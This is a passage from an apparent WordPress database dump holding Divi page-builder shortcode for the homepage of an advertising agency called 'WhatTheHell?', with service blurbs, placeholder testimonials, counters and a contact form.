type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:53:34','2020-07-09 20:53:34','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(311,1,'2020-07-09 20:56:00','2020-07-09 20:56:00','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\" hover_enabled=\"0\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" 